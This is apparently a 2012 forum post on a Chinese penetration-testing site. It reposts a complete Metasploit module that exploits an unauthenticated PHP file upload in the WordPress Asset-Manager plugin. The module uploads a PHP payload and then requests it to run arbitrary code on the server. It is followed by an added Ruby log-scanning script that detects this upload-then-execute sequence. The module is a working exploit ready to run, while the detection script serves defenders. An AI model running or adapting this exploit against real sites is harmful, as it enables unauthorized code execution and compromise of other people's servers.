中国网络渗透测试联盟

Author: admin    Time: 2012-12-31 09:22
Title: WordPress Asset-Manager PHP File Upload Vulnerability
This Metasploit module exploits a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. It allows PHP file upload: a user can upload a file to a temp directory without authentication, which results in arbitrary code execution.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart/form-data body expected by the plugin's upload.php
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # upload.php echoes the stored file name on success
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
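Added here as a defender's example, not part of the original post or of the Metasploit module above: a Ruby check that scans web-server access log lines for the two-step sequence the module performs (a successful POST to asset-manager/upload.php followed by a request for a .php file under wp-content/uploads/assets/temp/ from the same client) and, independently, flags any request for PHP under that temp directory. The log lines are constructed samples; the paths are the ones the module uses.

```ruby
require 'set'

# Constructed sample access log lines (combined log format), not real traffic.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [31/Dec/2012:09:22:01 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 57 "-" "Mozilla/5.0"
  203.0.113.7 - - [31/Dec/2012:09:22:02 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kqzvb.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  198.51.100.4 - - [31/Dec/2012:09:25:10 +0000] "GET /wordpress/wp-content/uploads/2012/12/photo.jpg HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
  198.51.100.4 - - [31/Dec/2012:09:25:11 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 403 0 "-" "Mozilla/5.0"
  192.0.2.9 - - [31/Dec/2012:09:30:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/abc.php HTTP/1.1" 404 0 "-" "Mozilla/5.0"
LOG

LINE_RE    = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/
UPLOAD_RE  = %r{/wp-content/plugins/asset-manager/upload\.php\z}
TEMP_PHP_RE = %r{/wp-content/uploads/assets/temp/[^/]+\.php\z}i

# Returns an array of alert hashes. Two detections:
#  - :php_in_uploads   any request for a .php file under uploads/assets/temp,
#                      whatever the status (PHP should never be served from there)
#  - :upload_then_exec a request for temp/*.php from a client whose earlier POST
#                      to upload.php returned 200, i.e. the module's two-step sequence
def detect_asset_manager_abuse(log_text)
  alerts = []
  uploaded = Set.new  # clients whose upload POST succeeded
  log_text.each_line do |line|
    m = LINE_RE.match(line) or next        # skip lines that are not in combined format
    ip, status = m[:ip], m[:status].to_i
    path = m[:path].split('?').first       # drop any query string before matching
    if m[:method] == 'POST' && UPLOAD_RE.match?(path)
      uploaded << ip if status == 200
    elsif TEMP_PHP_RE.match?(path)
      alerts << { kind: :php_in_uploads, ip: ip, path: path, status: status }
      alerts << { kind: :upload_then_exec, ip: ip, path: path, status: status } if uploaded.include?(ip)
    end
  end
  alerts
end

if __FILE__ == $PROGRAM_NAME
  detect_asset_manager_abuse(SAMPLE_LOG).each { |a| puts "#{a[:kind]} #{a[:ip]} #{a[:path]} (#{a[:status]})" }
end
```

A 404 for temp/*.php is still reported, since a probe for a file that is not there is worth seeing even when the upload step was not observed.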